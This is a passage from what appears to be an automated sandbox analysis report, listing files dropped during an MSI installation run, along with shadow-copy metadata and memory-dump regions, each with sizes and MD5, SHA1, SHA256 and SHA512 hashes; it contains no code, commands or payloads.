                            ed756b1760e563ce888276ff248c734b7dd851fb

                            SHA256

                            e44a6582cd3f84f4255d3c230e0a2c284e0cffa0ca5e62e4d749e089555494c7

                            SHA512

                            d3bfb4bd7e7fdb7159fbfc14056067c813ce52cdd91e885bdaac36820b5385fb70077bf58ec434d31a5a48245eb62b6794794618c73fe7953f79a4fc26592334

                          • C:\Windows\Installer\MSI16BF.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                            Filesize

                            179KB

                            MD5

                            1a5caea6734fdd07caa514c3f3fb75da

                            SHA1

                            f070ac0d91bd337d7952abd1ddf19a737b94510c

                            SHA256

                            cf06d4ed4a8baf88c82d6c9ae0efc81c469de6da8788ab35f373b350a4b4cdca

                            SHA512

                            a22dd3b7cf1c2edcf5b540f3daa482268d8038d468b8f00ca623d1c254affbbc1446e5bd42adc3d8e274be3ba776b0034e179faccd9ac8612ccd75186d1e3bf1

                          • C:\Windows\Installer\MSI1A99.tmp-\CustomAction.config

                            Filesize

                            1KB

                            MD5

                            bc17e956cde8dd5425f2b2a68ed919f8

                            SHA1

                            5e3736331e9e2f6bf851e3355f31006ccd8caa99

                            SHA256

                            e4ff538599c2d8e898d7f90ccf74081192d5afa8040e6b6c180f3aa0f46ad2c5

                            SHA512

                            02090daf1d5226b33edaae80263431a7a5b35a2ece97f74f494cc138002211e71498d42c260395ed40aee8e4a40474b395690b8b24e4aee19f0231da7377a940

                          • C:\Windows\Installer\MSI1A99.tmp-\Newtonsoft.Json.dll

                            Filesize

                            695KB

                            MD5

                            715a1fbee4665e99e859eda667fe8034

                            SHA1

                            e13c6e4210043c4976dcdc447ea2b32854f70cc6

                            SHA256

                            c5c83bbc1741be6ff4c490c0aee34c162945423ec577c646538b2d21ce13199e

                            SHA512

                            bf9744ccb20f8205b2de39dbe79d34497b4d5c19b353d0f95e87ea7ef7fa1784aea87e10efcef11e4c90451eaa47a379204eb0533aa3018e378dd3511ce0e8ad

                          • C:\Windows\Installer\MSI2058.tmp

                            Filesize

                            211KB

                            MD5

                            a3ae5d86ecf38db9427359ea37a5f646

                            SHA1

                            eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

                            SHA256

                            c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

                            SHA512

                            96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

                          • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                            Filesize

                            412B

                            MD5

                            8c7c1f7296538140438b033aeac12ece

                            SHA1

                            ea8a448d6c56f226ba7f028124e3aedc8ce1c1b8

                            SHA256

                            6f20e7f025f5fe02c8a7c81e11c4d6a301d8db72f670d7ff4ca346bbefaf29cf

                            SHA512

                            94bd67c73626a1c203f2a97cfd063fe5749bf6f6684eb07084bd344cddf3023c34a80b3ba9495beee49ea50fc6192cf215425d85ec50023ee4f59898012f0863

                          • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

                            Filesize

                            24.1MB

                            MD5

                            6eb95a1ad44481c865291209c8f60a83

                            SHA1

                            84c500bef326ac4e7c7dbbff0b23d7ef3fa5637d

                            SHA256

                            a60deec8c037788fd1893647a136beefc026d5c89db36842baba3f5b53d83e4d

                            SHA512

                            289def60b75e751732fb01d92713ef46947fffdd9bde5cd5138a463ae62a297fdc926fb00104ccd4d9c6f6f413e23ad828494c8b5a109ff3937e0aef30367db4

                          • \??\Volume{f0eec59f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{bca33aa1-f89f-447e-abfa-0cfe629df869}_OnDiskSnapshotProp

                            Filesize

                            6KB

                            MD5

                            8cf421275df07b7c5bea5b37358003df

                            SHA1

                            b25fba076e451cefc763b97bb83f3e092b688287

                            SHA256

                            3c7249c69fd83d42b4329dd1dc5491471ceef3027444df4eeeaf0f455a59eb6d

                            SHA512

                            e2068f371425d45db06acbef877de3116f715cd25359dd228ca01dac295875858c120d78e2b04ec04c4ddc0a9e357454ca9694a2f446918d65c55e3dd77e62be

                          • \??\pipe\crashpad_3048_COTXQDJVLQDXNHMY

                            MD5

                            d41d8cd98f00b204e9800998ecf8427e

                            SHA1

                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                            SHA256

                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                            SHA512

                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                          • memory/660-358-0x0000023F1C5F0000-0x0000023F1C620000-memory.dmp

                            Filesize

                            192KB

                          • memory/660-359-0x0000023F1D0C0000-0x0000023F1D170000-memory.dmp

                            Filesize

                            704KB

                          • memory/660-360-0x0000023F1CF80000-0x0000023F1CF9C000-memory.dmp

                            Filesize

                            112KB

                          • memory/872-149-0x00000000055B0000-0x0000000005662000-memory.dmp

                            Filesize

                            712KB

                          • memory/872-152-0x0000000005540000-0x0000000005562000-memory.dmp

                            Filesize

                            136KB

                          • memory/872-153-0x0000000005670000-0x00000000059C4000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1688-183-0x0000000004B10000-0x0000000004B76000-memory.dmp

                            Filesize

                            408KB

                          • memory/3796-233-0x000001952FEE0000-0x000001952FF78000-memory.dmp

                            Filesize

                            608KB

                          • memory/3796-238-0x0000019517670000-0x00000195176AC000-memory.dmp

                            Filesize

                            240KB

                          • memory/3796-237-0x0000019517610000-0x0000019517622000-memory.dmp

                            Filesize

                            72KB

                          • memory/3796-221-0x0000019515A30000-0x0000019515A58000-memory.dmp

                            Filesize

                            160KB

                          • memory/4000-112-0x0000000002C20000-0x0000000002C4E000-memory.dmp

                            Filesize

                            184KB

                          • memory/4000-116-0x0000000002C60000-0x0000000002C6C000-memory.dmp

                            Filesize

                            48KB

                          • memory/4912-268-0x0000014EB33B0000-0x0000014EB3462000-memory.dmp

                            Filesize

                            712KB

                          • memory/4912-314-0x0000014EB38F0000-0x0000014EB3928000-memory.dmp

                            Filesize

                            224KB

                          • memory/4912-275-0x0000014EB32F0000-0x0000014EB3312000-memory.dmp

                            Filesize

                            136KB